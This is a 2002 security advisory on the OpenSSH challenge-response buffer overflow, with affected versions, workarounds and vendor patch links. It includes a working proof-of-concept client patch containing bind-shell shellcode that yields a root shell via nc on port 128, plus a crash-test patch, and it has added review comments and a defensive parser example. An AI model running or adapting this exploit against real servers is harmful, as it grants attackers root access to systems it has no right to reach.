NSFOCUS Security Monthly, Issue 33, Latest Vulnerabilities
OpenSSH Challenge-Response Mechanism Keyboard-Interactive PAM Authentication Remote Buffer Overflow Vulnerability

Date: 2002-07-17

Published: 2002-6-28
Updated: 2002-6-28
Affected systems:
OpenSSH OpenSSH 3.3 p1
OpenSSH OpenSSH 3.3
OpenSSH OpenSSH 3.2.3 p1
OpenSSH OpenSSH 3.2.2 p1
OpenSSH OpenSSH 3.2
OpenSSH OpenSSH 3.1 p1
OpenSSH OpenSSH 3.1
OpenSSH OpenSSH 3.0.2
OpenSSH OpenSSH 3.0.1
OpenSSH OpenSSH 2.9p2
OpenSSH OpenSSH 2.9p1
OpenSSH OpenSSH 2.9.9
OpenSSH OpenSSH 2.9
OpenSSH OpenSSH 2.5.2
OpenSSH OpenSSH 2.5.1
OpenSSH OpenSSH 2.5
OpenSSH OpenSSH 2.3
OpenSSH OpenSSH 2.2
OpenSSH OpenSSH 2.1.1
OpenSSH OpenSSH 2.1
OpenSSH OpenSSH 2.0
OpenSSH OpenSSH 1.2.3
OpenSSH OpenSSH 1.2.2

Unaffected systems:
OpenSSH OpenSSH 3.4 p1
OpenSSH OpenSSH 3.4

Description:
---------------------------------------------------------------------

BUGTRAQ  ID: 5093
CVE(CAN) ID: CAN-2002-0640

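OpenSSH is an open-source implementation of the SSH protocol. It was originally written for the OpenBSD platform and has since been ported to many Unix/Linux-like operating systems.

The challenge-response code in OpenSSH versions 2.3.1p1 through 3.3 contains a vulnerability that a remote attacker can exploit to execute arbitrary commands on the system with the privileges of the sshd process (usually root).

The vulnerability is a buffer overflow in the handling of the responses received during the challenge-response authentication phase. Regardless of whether the challenge-response authentication option is configured, a system is vulnerable if it uses a PAM module with keyboard-interactive PAM authentication (PAMAuthenticationViaKbdInt). A remote attacker can exploit this to execute arbitrary commands on the system with the privileges of the sshd process.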
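
The count and length checks that keep a response handler of this kind inside its buffers, as an added C example that is not OpenSSH code and not part of the original advisory. The function names, result codes and sample bodies are assumptions made for illustration; the message layout (a count followed by length-prefixed strings) follows the client code quoted in the test patches on this page.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_RESPONSES 100u  /* same cap as the vendor patch quoted on this page */

/* Hypothetical result codes for this example. */
enum { RESP_OK = 0, RESP_TRUNCATED = -1, RESP_TOO_MANY = -2,
       RESP_COUNT_MISMATCH = -3, RESP_NOMEM = -4, RESP_TRAILING = -5 };

/* Read a big-endian uint32 (SSH wire encoding) without leaving the buffer. */
static int get_u32(const uint8_t *buf, size_t len, size_t *off, uint32_t *out)
{
    if (len - *off < 4)
        return RESP_TRUNCATED;
    *out = ((uint32_t)buf[*off] << 24) | ((uint32_t)buf[*off + 1] << 16) |
           ((uint32_t)buf[*off + 2] << 8) | (uint32_t)buf[*off + 3];
    *off += 4;
    return RESP_OK;
}

/* Clear and release an array of n response strings (entries may be NULL). */
void free_responses(char **resp, uint32_t n)
{
    for (uint32_t i = 0; resp != NULL && i < n; i++) {
        if (resp[i] != NULL)
            memset(resp[i], 0, strlen(resp[i]));
        free(resp[i]);
    }
    free(resp);
}

/* Parse the body after the SSH2_MSG_USERAUTH_INFO_RESPONSE type byte: uint32
 * count, then `count` strings (uint32 length + bytes). `expected` is the number
 * of prompts the server sent. On RESP_OK the caller owns *out. */
int parse_info_response(const uint8_t *buf, size_t len, uint32_t expected,
                        char ***out)
{
    size_t off = 0;
    uint32_t count, slen;
    char **resp;
    int rc;
    *out = NULL;
    if ((rc = get_u32(buf, len, &off, &count)) != RESP_OK)
        return rc;
    if (count > MAX_RESPONSES)      /* bound the peer-supplied count first */
        return RESP_TOO_MANY;
    if (count != expected)          /* answers must match the prompts sent */
        return RESP_COUNT_MISMATCH;
    if ((resp = calloc(count ? count : 1, sizeof(*resp))) == NULL)
        return RESP_NOMEM;
    for (uint32_t i = 0; i < count; i++) {
        rc = get_u32(buf, len, &off, &slen);
        if (rc == RESP_OK && slen > len - off)  /* length must fit the packet */
            rc = RESP_TRUNCATED;
        if (rc == RESP_OK && (resp[i] = malloc((size_t)slen + 1)) == NULL)
            rc = RESP_NOMEM;
        if (rc != RESP_OK)
            break;
        memcpy(resp[i], buf + off, slen);
        resp[i][slen] = '\0';
        off += slen;
    }
    if (rc == RESP_OK && off != len)  /* no trailing bytes, cf. packet_check_eom() */
        rc = RESP_TRAILING;
    if (rc != RESP_OK) {
        free_responses(resp, count);
        return rc;
    }
    *out = resp;
    return RESP_OK;
}

/* Constructed sample bodies (not captured traffic). */
const uint8_t SAMPLE_OK[]   = { 0,0,0,1, 0,0,0,3, 'a','b','c' };
const uint8_t SAMPLE_TWO[]  = { 0,0,0,2, 0,0,0,1,'x', 0,0,0,1,'y' };
const uint8_t SAMPLE_HUGE[] = { 0x40,0x00,0x04,0x00 }; /* 1073741824 + 1024 */
const uint8_t SAMPLE_LIE[]  = { 0,0,0,1, 0,0,0xFF,0xFF, 'a' };

/* Parse one sample for a server that sent `expected` prompts; return the code. */
int run_sample(const uint8_t *buf, size_t len, uint32_t expected)
{
    char **resp = NULL;
    int rc = parse_info_response(buf, len, expected, &resp);
    free_responses(resp, expected);  /* resp stays NULL unless rc == RESP_OK */
    return rc;
}

int main(void)
{
    printf("oversized count -> %d\n", run_sample(SAMPLE_HUGE, sizeof SAMPLE_HUGE, 1));
    return 0;
}
```

SAMPLE_TWO parsed with one expected prompt models the "got 2 responses" case in the server log further down; SAMPLE_HUGE carries the count used by the second test patch.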

<*Source: Mark Dowd
  
  Links: http://archives.neohapsis.com/archives/bugtraq/2002-06/0298.html
        http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-040.php
        http://www.suse.com/de/support/security/2002_023_openssh.html
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000500
        http://www.cert.org/advisories/CA-2002-18.html
        http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584
        http://www.debian.org/security/2002/dsa-134
        http://www.openssh.com/txt/preauth.adv
        ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-0005.txt.asc
        http://www.caldera.com/support/security/advisories/CSSA-2002-030.0.txt
        https://www.redhat.com/support/errata/RHSA-2002-127.html
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000502
*>

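Test programs:
----------------------------------------------------------------------

WARNING

The following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use them at your own risk!


Joe Testa <jtesta@rapid7.com> provided the following test method:

1) Build with PAM and S/KEY authentication support.

2) Patch the ssh client with the following patch: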

- --- sshconnect2.c.bak    Thu Jun 27 11:54:54 2002
+++ sshconnect2.c    Thu Jun 27 11:56:27 2002
@@ -866,6 +866,7 @@
     xfree(lang);

     num_prompts = packet_get_int();
+    num_prompts = 2;
     /*
      * Begin to build info response packet based on prompts requested.
      * We commit to providing the correct number of responses, so if
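Review bot: The added `num_prompts = 2;` directly after `num_prompts = packet_get_int();` throws away the prompt count the server sent, and nothing marks it as a test-only override. Add a comment stating that it deliberately makes the client answer with two responses regardless of what was requested, and keep it out of any build that is used as a normal client.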
@@ -877,15 +878,16 @@

     debug2("input_userauth_info_req: num_prompts %d", num_prompts);
     for (i = 0; i < num_prompts; i++) {
+      if ( i == 0 ) {
         prompt = packet_get_string(NULL);
         echo = packet_get_char();

         response = read_passphrase(prompt, echo ? RP_ECHO : 0);
- -
+      }
         packet_put_cstring(response);
- -        memset(response, 0, strlen(response));
+        /*memset(response, 0, strlen(response));
         xfree(response);
- -        xfree(prompt);
+        xfree(prompt);*/
     }
     packet_check_eom(); /* done with parsing incoming message. */
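Review bot: With the `if ( i == 0 )` guard, the second pass of the loop calls `packet_put_cstring(response)` on the pointer left over from the first pass, and the block comment that now wraps `memset`, `xfree(response)` and `xfree(prompt)` means the passphrase is never cleared and both buffers leak. Move the cleanup after the loop instead of commenting it out, and indent the added `if`/`}` lines to match the surrounding code.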

3) Add the option "PAMAuthenticationViaKbdInt yes" to the 'sshd_config' configuration file.

4) Connect to the SSHD daemon with the modified ssh client.

On the SSHD server side:

[root@wonderland hi_chad]# gdb /usr/sbin/sshd
GNU gdb Red Hat Linux 7.x (5.0rh-15) (MI_OUT)
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) run -d
Starting program: /usr/sbin/sshd -d
debug1: sshd version OpenSSH_3.2.3p1
debug1: private host key: #0 type 0 RSA1
debug1: read PEM private key done: type RSA
debug1: private host key: #1 type 1 RSA
debug1: read PEM private key done: type DSA
debug1: private host key: #2 type 2 DSA
socket: Address family not supported by protocol
debug1: Bind to port 22 on 0.0.0.0.
Server listening on 0.0.0.0 port 22.
Generating 768 bit RSA key.
RSA key generation complete.
debug1: Server will not fork when running in debugging mode.
Connection from 127.0.0.1 port 33208
debug1: Client protocol version 2.0; client software version OpenSSH_3.2.3p1
debug1: match: OpenSSH_3.2.3p1 pat OpenSSH*
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-1.99-OpenSSH_3.2.3p1
debug1: list_hostkey_types: ssh-rsa,ssh-dss
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: kex: server->client aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST received
debug1: SSH2_MSG_KEX_DH_GEX_GROUP sent
debug1: dh_gen_key: priv key bits set: 124/256
debug1: bits set: 1626/3191
debug1: expecting SSH2_MSG_KEX_DH_GEX_INIT
debug1: bits set: 1597/3191
debug1: SSH2_MSG_KEX_DH_GEX_REPLY sent
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: KEX done
debug1: userauth-request for user jdog service ssh-connection method none
debug1: attempt 0 failures 0
debug1: Starting up PAM with username "jdog"
debug1: PAM setting rhost to "localhost.localdomain"
Failed none for jdog from 127.0.0.1 port 33208 ssh2
debug1: userauth-request for user jdog service ssh-connection method
keyboard-interactive
debug1: attempt 1 failures 1
debug1: keyboard-interactive devs
debug1: auth2_challenge: user=jdog devs=
debug1: kbdint_alloc: devices 'skey'
debug1: auth2_challenge_start: trying authentication method 'skey'
debug1: got 2 responses
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x08053822 in strcpy ()
(gdb)

Christophe Devine (devine@iie.cnam.fr) provided a test program:

1. Download openssh-3.2.2p1.tar.gz and untar it


~ $ tar -xvzf openssh-3.2.2p1.tar.gz


2. Apply the patch provided below by running:


~/openssh-3.2.2p1 $ patch < path_to_diff_file


3. Compile the patched client


~/openssh-3.2.2p1 $ ./configure && make ssh


4. Run the evil ssh:


~/openssh-3.2.2p1 $ ./ssh root:skey@localhost


5. If the sploit worked, you can connect to port 128 in another terminal:


~ $ nc localhost 128
uname -a
OpenBSD nice 3.1 GENERIC#59 i386
id
uid=0(root) gid=0(wheel) groups=0(wheel)


--- sshconnect2.c Sun Mar 31 20:49:39 2002
+++ evil-sshconnect2.c Fri Jun 28 19:22:12 2002
@@ -839,6 +839,56 @@
/*
  * parse INFO_REQUEST, prompt user and send INFO_RESPONSE
  */
+
+int do_syscall( int nb_args, int syscall_num, ... );
+
+void shellcode( void )
+{
+ int server_sock, client_sock, len;
+ struct sockaddr_in server_addr;
+ char rootshell[12], *argv[2], *envp[1];
+
+ server_sock = do_syscall( 3, 97, AF_INET, SOCK_STREAM, 0 );
+ server_addr.sin_addr.s_addr = 0;
+ server_addr.sin_port = 32768;
+ server_addr.sin_family = AF_INET;
+ do_syscall( 3, 104, server_sock, (struct sockaddr *) &server_addr,
16 );
+ do_syscall( 2, 106, server_sock, 1 );
+ client_sock = do_syscall( 3, 30, server_sock, (struct sockaddr *)
+ &server_addr, &len );
+ do_syscall( 2, 90, client_sock, 0 );
+ do_syscall( 2, 90, client_sock, 1 );
+ do_syscall( 2, 90, client_sock, 2 );
+ * (int *) ( rootshell + 0 ) = 0x6E69622F;
+ * (int *) ( rootshell + 4 ) = 0x0068732f;
+ * (int *) ( rootshell + 8 ) = 0;
+ argv[0] = rootshell;
+ argv[1] = 0;
+ envp[0] = 0;
+ do_syscall( 3, 59, rootshell, argv, envp );
+}
+
+int do_syscall( int nb_args, int syscall_num, ... )
+{
+ int ret;
+ asm(
+ "mov 8(%ebp), %eax; "
+ "add $3,%eax; "
+ "shl $2,%eax; "
+ "add %ebp,%eax; "
+ "mov 8(%ebp), %ecx; "
+ "push_args: "
+ "push (%eax); "
+ "sub $4, %eax; "
+ "loop push_args; "
+ "mov 12(%ebp), %eax; "
+ "push $0; "
+ "int $0x80; "
+ "mov %eax,-4(%ebp)"
+ );
+ return( ret );
+}
+
void
input_userauth_info_req(int type, u_int32_t seq, void *ctxt)
{
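Review bot: The added `shellcode()` and `do_syscall()` rely on bare numeric constants (`97`, `104`, `106`, `30`, `90`, `59` and `sin_port = 32768`) with no comments, so a reader cannot tell which platform's system-call table is assumed or that the port value is already stored in network byte order. Step 5 on this page connects to port 128, which is what `32768` encodes on a little-endian host; a comment saying so, and naming each call, would make the test program auditable and tells a defender which listener to look for after a run.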
@@ -865,7 +915,7 @@
         xfree(inst);
         xfree(lang);
  
- num_prompts = packet_get_int();
+ num_prompts = 1073741824 + 1024;
         /*
          * Begin to build info response packet based on prompts requested.
          * We commit to providing the correct number of responses, so if
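Review bot: Replacing `packet_get_int()` with the literal `1073741824 + 1024` leaves the server's prompt count unread in the incoming packet and hides the intent behind a magic number (2^30 + 1024). Give the constant a name and a comment explaining the choice. On the receiving side this is the kind of peer-supplied count that has to be range-checked before use, which is what the `nresp > 100` test in the vendor patch on this page does.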
@@ -874,6 +924,13 @@
          */
         packet_start(SSH2_MSG_USERAUTH_INFO_RESPONSE);
         packet_put_int(num_prompts);
+
+ for( i = 0; i < 1045; i++ )
+ packet_put_cstring( "xxxxxxxxxx" );
+
+ packet_put_string( shellcode, 2047 );
+ packet_send();
+ return;
  
         debug2("input_userauth_info_req: num_prompts %d", num_prompts);
         for (i = 0; i < num_prompts; i++) {
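Review bot: `packet_put_int(num_prompts)` announces one count while the added loop sends 1045 strings followed by one 2047-byte blob, and the `return;` after `packet_send()` turns the rest of the function, including the `debug2` call and the prompt loop, into dead code. If this stays as a test client, delete the unreachable code rather than leaving it behind the return, and comment the literals `1045` and `2047`. A receiver should reject any message whose announced count differs from the number of prompts it issued.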

----------------------------------------------------------------------
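Recommendations:

Temporary workarounds:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

*  1) Disable SSH protocol version 2:

Because these two vulnerabilities exist only in SSH protocol version 2, disabling protocol version 2 prevents them from being exploited. This can be done by editing the /etc/ssh/sshd_config configuration file:

Protocol 1

*  2) Disable the challenge-response authentication option:

For OpenSSH versions above 2.9, the system administrator can set "ChallengeResponseAuthentication" to "no" in the sshd configuration file by changing the line in /etc/ssh/sshd_config to:

ChallengeResponseAuthentication no

This prevents exploitation when SKEY or BSD_AUTH authentication is in use, but it does not prevent exploitation through keyboard-interactive PAM authentication (PAMAuthenticationViaKbdInt).

*  3) Disable keyboard-interactive PAM authentication:

For OpenSSH versions above 2.9, the system administrator can set "PAMAuthenticationViaKbdInt" to "no" in the sshd configuration file by changing the line in /etc/ssh/sshd_config to:

PAMAuthenticationViaKbdInt no

This option defaults to "no". Setting it prevents exploitation when keyboard-interactive PAM authentication is in use, but it does not prevent exploitation through the SKEY or BSD_AUTH authentication modes.

*  4) Disable both options in older OpenSSH versions:

For OpenSSH versions between 2.3.1p1 and 2.9, the system administrator can set the following options to prevent these two vulnerabilities from being exploited:

KbdInteractiveAuthentication no
ChallengeResponseAuthentication no

*  5) Use privilege separation to minimize the impact of the vulnerabilities:

OpenSSH 3.2 and 3.3 can use the "UsePrivilegeSeparation" option to enable privilege separation. Add the following line to /etc/ssh/sshd_config:

UsePrivilegeSeparation yes

This measure does not prevent the vulnerabilities from being exploited. However, because of the privilege separation mechanism, an attacker who successfully exploits them and obtains a shell is confined to a restricted chroot environment. It also does not prevent an attacker from carrying out denial-of-service attacks. Administrators are advised to upgrade the software or apply the patch.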

Vendor patches:

Caldera
-------
Caldera has released a security advisory (CSSA-2002-030.0) for this issue:
CSSA-2002-030.0: Linux: OpenSSH Vulnerabilities in Challenge Response Handling
Link: http://www.caldera.com/support/security/advisories/CSSA-2002-030.0.txt

Conectiva
---------
Conectiva has released a security advisory (CLA-2002:502) and corresponding patches for this issue:
CLA-2002:502: openssh
Link: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000502

Patch downloads:
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/openssh-3.4p1-1U60_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-3.4p1-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-askpass-3.4p1-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-askpass-gnome-3.4p1-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-clients-3.4p1-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssh-server-3.4p1-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/openssh-3.4p1-1U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-3.4p1-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-askpass-3.4p1-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-askpass-gnome-3.4p1-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-clients-3.4p1-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssh-server-3.4p1-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/openssh-3.4p1-1U8_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-3.4p1-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-askpass-3.4p1-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-askpass-gnome-3.4p1-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-clients-3.4p1-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/openssh-server-3.4p1-1U8_1cl.i386.rpm

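Users of Conectiva Linux version 6.0 and later can update the RPM packages with apt:

- Add the following line to the /etc/apt/sources.list file:
  
rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates

(If you are not using version 6.0, replace the 6.0 above with the appropriate version number.)

- Run:                       apt-get update
- After the update, run:     apt-get upgrade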

Debian
------
Debian has released a security advisory (DSA-134-4) and corresponding patches for this issue:
DSA-134-4: OpenSSH Remote Challenge Vulnerability
Link: http://www.debian.org/security/2002/dsa-134

Patch downloads:

Source archives:

http://security.debian.org/pool/updates/main/o/openssh/openssh_3.4p1.orig.tar.gz
Size/MD5 checksum:   837668 459c1d0262e939d6432f193c7a4ba8a8
http://security.debian.org/pool/updates/main/o/openssh/openssh_3.4p1-0.0potato1.dsc
Size/MD5 checksum:      871 dd0f18d576520cb7110f5791bce67708
http://security.debian.org/pool/updates/main/o/openssh/openssh_3.4p1-0.0potato1.diff.gz
Size/MD5 checksum:    33706 ff798880b0835dcc77e42a2b9a075148
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c.orig.tar.gz
Size/MD5 checksum:  2153980 c8261d93317635d56df55650c6aeb3dc
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1.diff.gz
Size/MD5 checksum:    37925 718ffc86669ae06b22d77c659400f4e8
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1.dsc
Size/MD5 checksum:      784 b197de235e0d10f7bb66b4751808a033

Architecture independent packages:

http://security.debian.org/pool/updates/main/o/openssl/ssleay_0.9.6c-0.potato.1_all.deb
Size/MD5 checksum:      976 6b39f5a320b1c8bdbba05e2c8b041b70

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.4p1-0.0potato1_alpha.deb
Size/MD5 checksum:    34968 3e1792f1e5746c5ba7db3e025df60cbe
http://security.debian.org/pool/updates/main/o/openssh/ssh_3.4p1-0.0potato1_alpha.deb
Size/MD5 checksum:   865634 52934fd0175f560735a9a4664363791a
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-0.potato.1_alpha.deb
Size/MD5 checksum:   589696 f0263fe6848b8bd09ad07a370ed6310a
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1_alpha.deb
Size/MD5 checksum:   746344 5a06b3db8f6eabf063c3099cb539ffe9
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-0.potato.1_alpha.deb
Size/MD5 checksum:  1548926 377068d478722db72c2fe52f3c23312b

arm architecture (ARM)

http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.4p1-0.0potato1_arm.deb
Size/MD5 checksum:    34202 ee81aaf2953dc0524878e906ff47a3f2
http://security.debian.org/pool/updates/main/o/openssh/ssh_3.4p1-0.0potato1_arm.deb
Size/MD5 checksum:   664270 a61eb2a3cac706dcc6e6985bf7cf7817
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-0.potato.1_arm.deb
Size/MD5 checksum:   468106 c1dc499d7a06db8e831906f942d1192e
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-0.potato.1_arm.deb
Size/MD5 checksum:  1348440 7fb0b6f32b6eb2dfc78391a302bd0e02
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1_arm.deb
Size/MD5 checksum:   728932 0a9872153979c364d41208082c80772d

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/o/openssh/ssh_3.4p1-0.0potato1_i386.deb
Size/MD5 checksum:   642966 b782a41d2d37003242835772cfc24c88
http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_3.4p1-0.0potato1_i386.deb
Size/MD5 checksum:    34500 ecb44504ec7c8f6470162f74d62b278f
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-0.potato.1_i386.deb
Size/MD5 checksum:  1290006 362451bafdf4fe2104e54a0336893519
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-0.potato.1_i386.deb
Size/MD5 checksum:   461994 a1c785ce6982b9031410362f124d873a
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-0.potato.1_i386.deb
Size/MD5 checksum:   730338 747306c7e4ef0b767cb2985b74047b05

m68k architecture (Motorola Mc680x0)

http://security.debian.org/pool/updates/main/o/openssh/ssh_3.4p1-0.0potato1_m68k.deb
Size/MD5 ch


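Patch installation:

1. Install the patch packages manually:

  First, download the patch package with the following command:
  # wget url  (url is the patch download link)

  Then install the patch with the following command:
  # dpkg -i file.deb (file is the name of the corresponding patch)

2. Install the patch packages automatically with apt-get:

   First, update the internal database with the following command:
   # apt-get update
  
   Then install the updated packages with the following command:
   # apt-get upgrade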

MandrakeSoft
------------
MandrakeSoft has released a security advisory (MDKSA-2002:040) and corresponding patches for this issue:
MDKSA-2002:040: openssh
Link: http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-040.php

Patch downloads:

Updated Packages:

Linux-Mandrake 7.1:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.1/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Linux-Mandrake 7.2:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/7.2/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Mandrake Linux 8.0:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.0/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Mandrake Linux 8.0/ppc:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/openssh-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/openssh-askpass-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/openssh-clients-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/RPMS/openssh-server-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.0/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Mandrake Linux 8.1:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Mandrake Linux 8.1/ia64:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/openssh-3.3p1-3.1mdk.ia64.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/openssh-askpass-3.3p1-3.1mdk.ia64.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.ia64.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/openssh-clients-3.3p1-3.1mdk.ia64.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/openssh-server-3.3p1-3.1mdk.ia64.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Mandrake Linux 8.2:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Mandrake Linux 8.2/ppc:
